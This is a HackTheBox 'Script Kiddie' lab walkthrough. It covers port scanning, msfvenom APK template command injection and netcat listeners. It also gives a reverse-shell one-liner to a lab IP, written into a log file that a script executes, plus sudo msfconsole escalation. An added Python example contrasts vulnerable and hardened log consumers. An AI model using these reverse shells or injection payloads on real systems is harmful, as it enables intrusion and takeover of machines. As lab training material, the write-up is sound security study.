Script Kiddie - HackTheBox Walk Through - IT SECURITY DZ


4/24/2021 Script Kiddie : HackTheBox Walk Through – IT SECURITY DZ

IT SECURITY DZ

CYBERSECURITY

Script Kiddie : HackTheBox Walk Through

HTB recently released a machine named Script Kiddie. The name is a strong hint about the box: expect to lean on off-the-shelf tools rather than write anything yourself, which is more or less what "script kiddie" means.

So let's see how easy this machine turns out to be.

Concepts learnt:

1. Enumeration
2. Malicious payload (msfvenom APK template command injection)
3. Reverse shell
4. Privilege escalation

https://itsecuritydz.wordpress.com/2021/03/09/script-kiddie-hackthebox-walk-through/ 1/9
Port Scanning

First things first: scan the machine for open ports.

Command: sudo nmap -sC -sV 10.10.10.226 (default scripts plus version detection; the output is below. nmap -A -T4 gives the same result with OS detection and traceroute added and a faster timing template.)


┌─[venom@venom]─[~]
└──╼ $sudo nmap -sC -sV 10.10.10.226
[sudo] password for venom:
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-09 12:43 EST
Nmap scan report for 10.10.10.226
Host is up (0.088s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.33 seconds

Only two ports are open: 22 (SSH, OpenSSH 8.2p1 on Ubuntu) and 5000 (HTTP, served by a Python Werkzeug server, which usually means a Flask application). The page title, k1d'5 h4ck3r t00l5, already tells us what to expect.

Enumeration

Let's see what is served on port 5000 over HTTP by visiting the IP address with the port number.

Visit: http://10.10.10.226:5000/ (in any browser)


Looking at the web page, there is a lot to try: command injection, RFI, LFI, file upload vulnerabilities and so on.

After trying all the options, what got us a reverse shell was the file upload, which leads to command injection. Let's see how it is done.

Malicious Payload Creation:

The payload generator on the page lets us upload a template file when building a payload. Searching (Google) for exploits involving msfvenom template files turns up Rapid7's APK Template Command Injection module.

We are lucky here: there is an APK template command injection, and the website lets us upload an APK template. So we build the malicious APK with that module and upload it to get the reverse shell.

Using Metasploit (msfconsole), the steps are:


FYI: this means selecting the module and setting the reverse payload's LHOST and LPORT (our VPN IP and the listener port). The module only writes an APK file, so there is no RHOST/RPORT to set.

Once everything is set, the only thing left is to press the fire button, I mean run exploit. The module prints where it stored the generated APK.

Note: if the module is not listed, update Metasploit (msfupdate), or download the module file into ~/.msf4/modules/ and run reload_all inside msfconsole.

Now we upload the file to get the reverse shell. But first we need a listener; netcat will do, listening on the port we set as LPORT.


┌─[venom@venom]─[~]
└──╼ $nc -lvp 5555
listening on [any] 5555 ...

All set! Let's upload the file and see what happens.


Change the options to match your own setup, i.e. LHOST (the VPN IP of your attacking machine) and LPORT.

Boom! We got a reverse shell.

Upgrade it to an interactive TTY with Python's pty module:

Command used: python3 -c 'import pty; pty.spawn("/bin/bash")'

Exploring the system as this low-privileged user gets us to the first checkpoint, the user flag.

Two things stood out: our user has very limited permissions, and there is another account named pwn on the machine. There are scripts and files belonging to pwn that we cannot read or run.

Privilege Escalation

Escalating to a user with higher privileges, i.e. pwn.

While exploring the system I came across a file named hackers. What caught my attention was its group owner, pwn. The file is consumed by a pwn-owned script (scanlosers.sh) that passes the contents of each line to a shell, so a command written into the file is executed as pwn, and a reverse shell written there gives us a shell as pwn. Read the script first to see exactly how it splits each line before handing it to the shell; the payload below is built around that.

Reverse shell one-liners to pick from:
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

Now we just have to adapt the reverse shell one-liner so that it still works when the script reads it out of the file. Thus the command used:


echo "  ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.30/1234 0>&1' #" >> hackers

Here 10.10.14.30 is the attacking host's IP and 1234 the port the listener waits on. The leading spaces and the trailing # are part of the payload: scanlosers.sh cuts the first two space-separated fields off each line of hackers before handing the remainder to sh -c, so the two spaces put the ; at the start of what the shell sees, and the # comments out whatever the script appends after it. Keep the quoting exactly as written (straight quotes, not curly ones).

Before running this, start the listener again, this time on port 1234.

┌─[venom@venom]─[~]
└──╼ $nc -lvp 1234
listening on [any] 1234 ...

Now run the echo command. When the script next processes the file, the listener on port 1234 catches a shell as pwn.

Now that we have the higher-privileged user, let's run the script we could not run before, scanlosers.sh.

Huh! Nothing visible happened.
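Why the line appended to hackers ends up executing as pwn, and how the consuming script could have been written to resist it, shown as an added Python example (my code, not code from the post or from the box). It models a scanlosers-style consumer that strips the two timestamp fields from each log line and hands the rest to sh -c; the log lines, the consumer and the nmap command line are constructed for the illustration and are an assumed simplification of the real script. The vulnerable version really runs sh, with a harmless echo standing in for the reverse shell. The same bug class is what the APK template module exploited earlier: a field taken from the uploaded template ended up inside a shell command built by msfvenom.

```python
"""Added example: command injection through a log consumer that builds a
shell string, beside a hardened consumer that validates the field and uses
an argv list. All inputs below are constructed for this illustration."""
import ipaddress
import subprocess
from typing import List, Tuple

# Constructed sample of a hackers log: "[date time] ip" lines as the web app
# would write them, plus the line the walkthrough appends with echo. The two
# leading spaces push the injected text into the third space-separated field,
# which is the field the consumer treats as the scan target. A benign echo
# stands in for the reverse shell.
HACKERS_LOG = (
    "[2021-03-09 12:43:01] 10.10.14.30\n"
    "[2021-03-09 12:50:17] 10.10.14.31\n"
    "  ;echo INJECTED #\n"
)


def target_field(line: str) -> str:
    """Mimic `cut -d' ' -f3-`: drop the two timestamp fields, keep the rest."""
    return " ".join(line.split(" ")[2:])


def vulnerable_consumer(log_text: str) -> List[str]:
    """Insecure pattern: the target is interpolated into a string that sh -c
    parses, so ; # and friends are honoured. printf stands in for nmap so the
    example runs anywhere. Returns what each shell invocation printed."""
    outputs = []
    for line in log_text.splitlines():
        target = target_field(line)
        cmd = f"printf 'would scan %s\\n' {target}"
        result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
        outputs.append(result.stdout)
    return outputs


def hardened_consumer(log_text: str) -> Tuple[List[List[str]], List[str]]:
    """Secure pattern: take exactly one field, validate it as an IP address,
    and build an argv list that no shell ever parses.
    Returns (planned argv lists, rejected log lines)."""
    planned, rejected = [], []
    for line in log_text.splitlines():
        fields = line.split(" ")
        candidate = fields[2] if len(fields) > 2 else ""
        try:
            ip = ipaddress.ip_address(candidate)  # raises on ';echo', '', etc.
        except ValueError:
            rejected.append(line)
            continue
        # Each element is one argument; a validated IP cannot carry shell
        # metacharacters or path separators into -oN either. Returned rather
        # than executed because nmap may not be installed where this runs.
        planned.append(["nmap", "--top-ports", "10", "-oN", f"recon/{ip}.nmap", str(ip)])
    return planned, rejected


if __name__ == "__main__":
    for out in vulnerable_consumer(HACKERS_LOG):
        print(repr(out))
    scans, bad = hardened_consumer(HACKERS_LOG)
    print("planned:", scans)
    print("rejected:", bad)
```

Running it shows the third log line producing INJECTED output from the vulnerable consumer, while the hardened consumer schedules scans only for the two real addresses and reports the injected line as rejected. Logging rejected lines is the cheap detection here: on the real box, anything in hackers that is not an IP is someone trying exactly this.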

Let's check what sudo allows this user to run.

Command used: sudo -l

Oh nice! pwn can run msfconsole as root with no password.

Running Metasploit with sudo privileges:


FYI: msfconsole passes any command it does not recognise to the system shell, so a bash shell can be started straight from the msf prompt.

Let's check whether it works here: it does.

Moving on, check whether Metasploit started with root privileges (run id from the msf prompt; it reports uid=0(root)).

As expected. Since we now have everything, move to /root from the Metasploit shell and complete the second checkpoint, the root flag (hash).

Finally, user and root of Script Kiddie are pwned. It was kind of easy, though!

For more blogs and updates, stay tuned!


Published by zakou chender

Nothing much: someone, somewhere, who loves cybersecurity stuff. My name is Chender Zakaria; I am a network engineer and also a pentester. I love cybersecurity stuff and I love helping people, so I made this website to share my experience. Helping you is my pleasure.

March 9, 2021
Hackthebox

Tags: APK template command injection, hackthebox walkthrough, hackthebox writeups, Script Kiddie : HackTheBox Walk Through, Script Kiddie writeup, ScriptKiddie hack the box writeup

5 thoughts on “Script Kiddie : HackTheBox Walk Through”

1. shahid
says:
April 15, 2021 at 08:58
Hi, I'm unable to upload the msf.apk file. It's in root and I can't upload it by selecting the browse option, even when I searched for .msf4 in the terminal. Can you please help me out?

[+] msf.apk stored at /root/.msf4/local/msf.apk

This is the file location; how do I upload it?

2. shahid
says:
April 15, 2021 at 09:33
Issue solved. I uploaded the file and cracked the user hash.

1. zakou chender
says:
April 15, 2021 at 21:21
Congrats, just have patience.

3. shahid1112
says:
April 16, 2021 at 23:19
Hello, after cracking the user hash, next is the root hash. I followed the same steps as you did, but I'm unable to get into pwn@scriptkiddie. I have tried everything I know. I even tried to generate SSH keys using ssh-keygen; even that was unsuccessful.
Could you please help me out?

4. shahid1112
says:
April 17, 2021 at 09:04
Should I upload any file while listening on port 1234?
